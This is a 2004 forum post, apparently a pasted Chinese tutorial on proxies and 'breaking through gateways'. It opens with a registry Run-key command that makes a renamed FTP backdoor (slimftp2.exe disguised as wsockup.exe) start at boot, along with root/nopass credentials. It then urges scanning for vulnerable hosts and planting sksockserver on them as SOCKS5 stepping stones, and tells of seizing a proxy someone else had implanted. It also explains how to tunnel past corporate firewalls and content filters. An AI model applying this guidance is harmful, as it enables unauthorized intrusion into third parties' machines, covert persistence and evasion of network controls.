root   nopass   注意事项:你可以将slimftp2.exe的文件名、服务端口更改,但是,相应的步骤输入也应该更改。   比如,我将slimftp2.exe改名叫wsockup.exe,那么:   reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe   就应该变为:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d wsockup.exe 八.代理服务器的基本概念和一些相关技巧 我们知道,代理分为免费的和收费的,最近我们公司就搞了个收费的代理,unix系统,速度还真是快!不过我没钱啊~~用不了,哼!总有一天我要黑了它!~~~ 好了,现在我们来讲讲免费代理。 代理按功能不同来分可以分为http代理,ftp代理,telnet代理,socks代理等。 我们先来讲讲代理的好处,首先,用代理可以掩护自己,使自己的IP受到保护,比如,你用了 代理服务器去浏览网站时,服务器记录的就不是你的真实IP,而是代理的IP 这中间的好处就不用我说了吧,做坏事的人心里有数,呵呵。 当然,对于一些网速不快的朋友来说用代理可以提高网速,还可以访问一些被严禁访问的站点:) 下面我们就来说说代理的原理,比如说你是A机,B是代理服务器,C是你要访问的主机 但是你连C机连不上,但是你连B的速度很快,B连C的速度也很快 所以你就可以先连到B,再由B连到C。 这样,我们也可以了解到路由器是怎样封锁我们的访问的,比如路由器禁止了C的连接, 但没禁止我们对B的连接,所以我们可以通过B访问C! 好了,罗嗦了这么多,大家对代理服务器的概念有了吧? 下面我们开始正题,正如前面所讲的,在互联网上有很多地方提供免费的代理服务器, 但要记住,免费的代理只是暂时的,没有哪个白痴会把自己的机子一直设成免费的代理来和大家 一起用!!!所以,一定要珍惜代理! 那么,我们在哪里可以找到这些代理呢?其实网上有很多无聊的人会不停的给你找代理 然后,再把代理贴出来。我们要怎么找到这些列表呢? 我在这里推荐google!!! 伟大的google(www.google.com) 有史以来最好的搜索引擎! 我们搜索 -》代理服务器,会出来大量的网址,我们随便找几个,发现里面有很多代理 但是,代理对于各地的速度会不同,有的还连不上,怎样才能找出真正快的呢? 这里,要用到代理猎手!这个找代理的利器,这个软件在www.ttian.net有下载。 首先,我们将代理列表复制下来,以txt方式保存。 然后打开代理猎手,-》搜索结果-》导入结果(刚才的txt文件) 然后点验证全部! 这样就可以过滤掉连不上的,再点一下时间特性,就可以看出哪个最快了!!! 这样就可以找到许多代理!注意,验证超时的也很有可能是代理!! 全面我们讲了代理的概念和找代理的方法,接下来我们就要讲socks代理,我的最爱~~~ socks代理分为socks4和socks5两种,socks4只支持tcp/ip协议,不支持加密,只支持 ip地址,相对而言socks5功能就要强多了,所以,我们一般用socks5来做跳板!! 但是,现在网上的socks5太少了,毕竟很珍贵嘛~~~ 所以,我们只好自己来做了! 我们一般是用snake的sksockserver,我很喜欢snake的这个工具,这样以后就不怕没代理了 我在这里只提供一种思路,具体做法会在另一篇文章中提到! 大家可以用流光扫描,找到有漏洞主机,然后把sksockserver传上去,再安装,net start一下 就搞定了! 讲了这么久居然忘了讲socks5怎么用了!我们 一般是用sockscap32或是sockhttp,但我推荐前者!这是自己的感觉而已。我们用sockscap32给流光挂上代理,就可以从容的去干坏事了,呵呵! 但是,切记,连跳板一样会在上面留下痕迹,所以大家在玩时不要太过火!以免自焚,因为对方如果认真的话,就算是顺着路由器也可以把你找出来!!! 下面再讲一次我检到一太socks5的事,由于不久前我得到了一个http代理,速度还不错我就想把它作成socks5,随便用sss扫了一下,先是发现漏洞一大堆,接着就发现很奇怪的开了一个918的端口,还是socks5的,看来已经有人比我抢先了,哈哈,那我就不好意思了,当然是拿过来用了再说,对吧? 另外,大家要搜socks5的话,可以用proxyhunter或是superscan搜5262,或是1813的端口, 说不定还能搜到几台,不过我建议大家自己做!毕竟,是自己的跳板嘛!!! 九.突破网关 网络的普及,使得信息交流和资源共享变得十分方便,同时也变得十分重要。很多公司开始通过不同的方式接入Internet,一方面他们为了满足员工需求,为他们提供各种不同的服务(Internet浏览和E-mail可能是我们最常见的两种方式);同时为了安全或者其它因素,他们还要做一些不同程度的限制:有的员工太喜欢用ICQ聊天了,可以限制他使用;有的员工下载占用公司太多的流量,要限制他下载;当然更多的公司要限制那些Sex、Chat站点…… 不过,俗话说“道高一尺,魔高一丈”,只要有限制就肯定有反限制方法,今天我们这里要介绍的就是一些反限制方法。这些反限制方法实际上是利用了一些网关服务器的漏洞,只要网络管理人员细心的话是不可能不发现的,所以你千万不要认为知道这些就可以“为非作歹”,要知道如果网络管理人员愿意,他们可以追踪到你的任何操作并随时可以中断。我们给你提供这些反限制方法,只是为了你少麻烦网络管理人员一些:不要动不动就要他帮你下载软件(你可以在网络速度不错的时候自己做的)、如果你临时需要通过ICQ联系一下朋友、如果你因工作需要访问一个受限制的站点…… 要突破网关,我们首先需要了解一些网络基础知识,这样即使你的网络架构和我这里所描述的不是很一样,也可以找出相应的解决方法! 几个名词 协议 Protocol,一组在网络上发送信息的规则和约定。这些规则控制在网络设备间交换消息的内容、格式、定时、顺序和错误控制。通俗的说就是不同的网络程序的交流语言,我们常见的OICQ使用UDP协议、ICQ使用TCP协议、E-mail程序使用POP3和SMTP协议,正像我们国人使用汉语一样…… 节 常见的协议中Socks是一种比较复杂的协议,不过复杂有复杂的好处,它可以完成其它协议相同的工作(将它们转发),所以很多应用程序(ICQ、OICQ、Napster、MSN Messanger等等)都提供了Socks支持。 网关 网关的英文名字是Gateway,最初的意思是连接两个协议差别很大的计算机网络时使用的设备。通过网关可以将不同体系结构的计算机网络连接在一起,例如IBM的SNA服务器要和DEC公司的网络交流信息,就可以通过网关来实现,它完成复杂的协议转换工作,并将数据重新分组发送。在OSI中,网关属于最高层(应用层)的设备。网关本身不具有Cache(缓存),只是协议的转换或者转发。 代理服务器 代理服务器(Proxy)是网络信息的中转站。一般情况下,我们使用网络浏览器直接去链接其它Internet站点并取得网络信息时,须送出Request信号来得到回答,然后对方再把信息传送回来。代理服务器是介于浏览器和Web服务器之间的一台服务器,有了它之后,浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求,Request信号会先送到代理服务器,由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且,大部分代理服务器都具有缓冲的功能,就好像一个大的Cache,它不断将新取得数据包存到它本机的存储器上,如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的,那么它就不重新从Web服务器取数据,而直接将存储器上的数据传送给用户的浏览器,这样就能显著提高浏览速度和效率。 其实上边所讲的只是代理服务器的一个作用——代理访问。在平时的使用中通过代理服务器的Internet连接共享(Win2000自带的“Internet连接共享”、WinGate、SyGate和微软的MS Proxy都是很出名的代理服务实现方式),我们还可以节省IP开销,所有用户对外只占用一个IP,所以不必租用过多的IP地址,降低网络的维护成本。这样,局域局内没有与外网相连的众多机器就可以通过内网的一台代理服务器连接到外网,大大减少费用。 防火墙 防火墙(Firewall)是一个系统(或一组系统),它能增强机构内部网络的安全性。防火墙系统决定了哪些内部服务可以被外界访问;外界的哪些人可以访问内部的特定的服务,以及哪些外部资源可以被内部人员访问。要使一个防火墙有效,所有进入和外出的信息都必须经过防火墙,接受防火墙的检查。防火墙必须只允许授权的数据通过,并且防火墙本身也必须能够免于渗透。但不幸的是,防火墙系统一旦被攻击者突破或迂回,就不能提供任何的保护了(这也是我们的伎俩得以实现的原因……)。 防火墙的实现方式包括包过滤路由器和应用层网关。包过滤路由器可以过滤协议(ICMP、UDP、TCP等),只允许特定的协议通过;应用层网关就是我们常说的代理服务器,它可以提供比路由器更严格的安全策略,我们平时的各种限制就是在应用层实现的。 看到这里,你可能已经明白了,我们所说的“突破网关”其实是突破防火墙的限制。不过我们下边的所有动作有一个前提条件,你可以浏览http://www.totalrc.net网站,如果已?..鲂枰娜砑桑?/a> 必需工具: Socks2HTTP 最新版本:0.88 下载网址:http://www.totalrc.net/ 一个协议转换工具,它可以将你的所有的Socks协议转换为HTTP协议,然后通过代理服务器的HTTP代理端口连接到Totalrc公司,再转化成Socks发给相应的通讯方,这样只要你可以使用HTTP协议(也就是说只要你可以浏览网页),你就可以通过Socks2HTTP使用Socks协议。 SocksCap 最新版本:Version 2.1 下载网址:http://www.socks.nec.com/reference/sockscap.html Nec公司开发的透明代理软件,它可以使那些基于Windows的通过TCP或者UDP协议通讯的客户端软件自动穿过Socks代理服务器,你根本不用在客户端做任何设置,简单的说就是起了一个重定向的作用。SocksCap是一个免费软件,你可以免费使用90天。(注:听说Nec新开发了一个e-Border Client软件,功能更加强大,不过却是商业软件,你可以去下载一个30天的试用版)。 ProxyHunter 最新版本:3.1 Beta 1 下载网址:http://member.netease.com/~windzh 太阳风工作室开发的一个代理服务器搜索程序,搜索速度十分快捷,是使用代理服务器必备软件。 Socks2HTTP/SocksCap安装设置 为了完成突破网关的重大使命,我们首先需要安装/设置两个软件,一个是Socks2HTTP,另外一个是SocksCap,跟我来吧…… 设置Socks2HTTP 下载运行Socks2HTTP软件,在出现配置窗口时,选择“Use a proxy server(使用代理服务器)”,在“Address(地址栏)”中输入所使用的http代理服务器的IP或域名(我这里是192.168.0.253),“Port”中输入使用的端口(一般是8080或者80,根据你自己的实际情况设置),选中“Block out other computer(禁止其它计算机连接)”可以防止别人使用你转换的Socks服务器。 现在你可以在Windows的驻留栏中看到一个的小图标,如果需要更改配置,则在此Socks2HTTP的图标上单击右键,选择“Configuration”,按照上图配置即可。 注意:实际上Socks2HTTP的协议转换是连接到http://12.98.142.221:80/servlets/ht...totalrc.net)。 设置SocksCap 运行SocksCap软件,选择“File(文件)”/“Settings(设置)”,在“SOCKS Server(Socks服务器)”中填入127.0.0.1,Port中填入1080,在“Protocol”中选择“SOCKS Version 5”,“Name Resolution(名称解析)”中选择“Attempt local then remote(本地先于远程)”,这样SocksCap也设置好了。 注意:SocksCap可以提供Socks 4/5两种版本的协议,Socks 4不支持UDP(就是OICQ和一些网络电话软件采用的)和用户认证,所以我们这里采用了功能更加强大的Socks 5。 突破网关实战 没有Socks权限也可用Napster 相信有很多朋友是通过局域网代理上网的,可是基于安全考虑一般网关会封杀80端口(HTTP代理)之外的代理,这样一来,你就无法使用ICQ、FTP和Telnet了,当然更不能使用那个MP3交流软件Napster了,上网少了很多乐趣?想个办法搞定它。 打开Napster的“File”/“Preference”,选择“Proxy”选项,选择“Proxy Type(代理服务器类型)”为“Socks 5 Proxy Server(Socks 5代理服务器)”,“Proxy Server(代理服务器)”中填写本地地址127.0.0.1,“Proxy Port(代理端口)”填写1080,现在你可以利用Napster和Internet上的朋友交流了…… 有的朋友问是否可以使用OICQ?其实OICQ的设置也是很简单的,在OICQ的“网络设置”中把代理服务器设置为本地的Socks 5,这样就能上OICQ了,但是速度实在是不敢恭维……你试试就知道了,反正我只成功过一次,还是只发了一条消息就断线了!也许有的朋友还在想等Socks2HTTP的正式版本发布,我倒觉得这不是Socks2HTTP的问题,对于同样是采用了UDP协议的ICQ99b来说,连接就十分顺畅,这只能是OICQ的问题吧!大家还是祈祷OICQ公司少一点炒作,多做一点实事吧…… 代理之外的代理 教育网内有很多好站点,可是并不是每一个用户都可以访问的,有的站点将很多IP地址屏蔽了,如果你的IP不幸在被屏蔽之列,那么是否就意味着你永远也别想访问这些优秀的教育网站点了? 答案同样是否定的,我们可以利用能够访问教育网的代理服务器!可是我的情况却不行,我们单位使用的是Wingate代理服务器,我的所有的客户端软件的代理服务器首先要设置为Wingate代理服务器的地址才可以上网,根本没有设置可以访问教育网站点的代理服务器的地方,到底该如何办呢? 很简单,看我是如何完成的: 1.利用Proxy Hunter来查找一个网上可以访问教育网的代理服务器(这可是一个艰巨的任务,你也不要问我要任何类型的代理服务器,“靠别人不如靠自己”,自己查找/验证吧,Good Luck……)。 2.打开SocksCap,按下“New”按钮,在弹出的“New Application Profile(新应用程序设置)”窗口中,按下“Browse(浏览)”按钮选择需要特别设置的应用程序(我们这里是"D:\Program Files\Internet Explorer\IExplore.exe")。 3.打开IE,设置代理服务器为你用Proxy Hunter搜集的可以访问教育站点的代理服务器。 4.在SocksCap中双击IE快捷方式,现在可以访问受限制的教育站点了,Enjoy it…… 透明代理 我很笨,我不明白客户端软件的那些烦杂的设置(我们公司使用的可是WinGate啊)……有没有办法将这些简化呢? 打开SocksCap,将所有的需要设置代理服务器的软件都添加到其中(那些不能设置代理服务器,可是还要访问网络的软件也是可以的),然后在SocksCap中打开这些程序就可以了,你不需要在客户端做任何设置。 嘿嘿,一个意外的发现:通过这种透明的代理,我们还可以访问那些内容被过滤了的站点,比如MP3…… 不过在SocksCap中打开IE浏览该站点却可以正常访问(IE中的代理服务器设置此时要取消)。 没有权限也可下载 很多地方的网关为了防止占用过多的带宽,将.exe、.zip、.rar等文件的下载权限关闭了,不过像我等软件狂热爱好者,不下载软件简直是要我的命,我们可以使用下边两种方法下载: 1.SocksCap的透明代理 这个我们上边已经说过,网关的内容过滤对于SocksCap不起作用,所以在SocksCap中打开下载软件就可以了。 注意:Socks2HTTP模拟的Socks服务不支持Ftp的PASV模式,所以不能断点续传,下载大软件请保重。 2.利用SSL下载。 需要说明一点的是,虽然这时你所浏览的内容是加密的,不过连接的站点在代理服务器上边是可见的,建议不要开太多的进程下载,如果给网络管理人员看到,将站点屏蔽的话,你的下载就成了泡影。 看到这里,你是否发现没有什么可以完全限制的,不过话又说回来,网络管理人员只要勤快、细心一些,也没有什么可以瞒过他的,而且你是为了方便,不是为了让网管将更多的站点屏蔽掉吧…… 其它相关软件 NECe-Border Client 相关网址:http://www.eborder.nec.com/ NEC e-Border Client与SocksCap一样是由NEC开发的。它是被NEC称为“完整的Socks解决方案”的e-Border系统的客户端部分。它不仅能连接到专用的e-Border服务器,而且能够连接到普通Socks5代理服务器,提供强大的Socks5代理调度。除了能像SocksCap那样对于特定的程序提供Socks5代理,也能截取你系统里的所有连接请求,将它们通过代理连接出去。更能设置多个Socks5代理服务器,提供更快更稳定的连接。所以,它除了能像SocksCap那样为普通网络应用程序提供代理,更能代理诸如DiabloⅡ、《星际争霸》的战网连接和《石器时代》、《万王之王》此类网络游戏的服务器登录。如果你使用的是局域网或是169而想玩在线游戏,SocksCap无能为力时,可以用它试试,你一定会有一个惊喜的。 HTTPort 相关网址:http://www.htthost.com/ 可以通过HTTP Proxy将本地的任何端口影射到远程主机的任何一个端口,如果你上网的地方被防火墙挡住,只提供一个HTTP Proxy让你出去的话,而你又想使用其它诸如FTP、POP3等服务时,这个软件就能发挥作用了。不过该软件不支持需要用户名和密码的HTTP Proxy,而且有些HTTP Proxy也不能使用,二级代理服务器使用必备,遗憾的是该软件不支持UDP,当然也就不支持OICQ。 ICQProxy 相关网址:http://icqproxy.com/ 让你的ICQ可以突破重围,ICQ是个相当便捷的工具,就算你的公司内部了采用防火将80之外的所有端口屏蔽,ICQ Proxy依然可以通过Port 80(HTTP)的通道帮你转接到远端的ICQ Server上,这样子当然防火墙也就不会挡住你的去路了。(注:该公司还有一个功能更加强大的类似软件Http-Tunnel)。 HTTPTunnel 最新版本:3.0.5 相关网址:http://www.nocrew.org/software/httptunnel.html 我们上边介绍的各种突破网关的软件都是基于Windows平台的(这对于当前最热门的Linux用户来说可不是什么好事),放心吧!我这里给你找了一个,不过是命令行方式的,要使用一些参数,看看说明吧。 注意:这个可不是开发ICQ Proxy公司的那个Http-Tunnel,而且它还有一个NT版本,只不过版本低了一些是3.0.3,到http://www.okchicken.com/~philip/httptunnel/看一下吧…… MultiProxy 最新版本:1.2 网址:http://www.multiproxy.org/ 代理自动调度的代理软件,你只需在MultiProxy下配置校验好可用的代理了,本机设定代理服务器为本机的IP,端口与MultiProxy中设置的一致就可以了。 代理服务器经典站点 Proxys4AII 相关网址:http://proxys4all.cgi.net/ 看到了吗?Proxys For All,服务于所有人的代理服务器站点。虽然是一个国外站点,可是却介绍了很多代理服务器和代理服务器相关知识、以及相关软件。如果你的英语还凑合的话,一定要去看一下,不是要你去看那些每日更新的HTTP、FTP、Telnet、Socks和Gopher代理服务器搜集,这些我们国内的代理可能更快一些,要你看的是那些Proxy Tools(代理服务器工具)和Proxy Info(代理服务器相关知识)。
作者: koook    时间: 2004-8-26 08:37     标题: [推荐]菜鸟用代理

文章长,收藏,慢慢学习,~~




欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2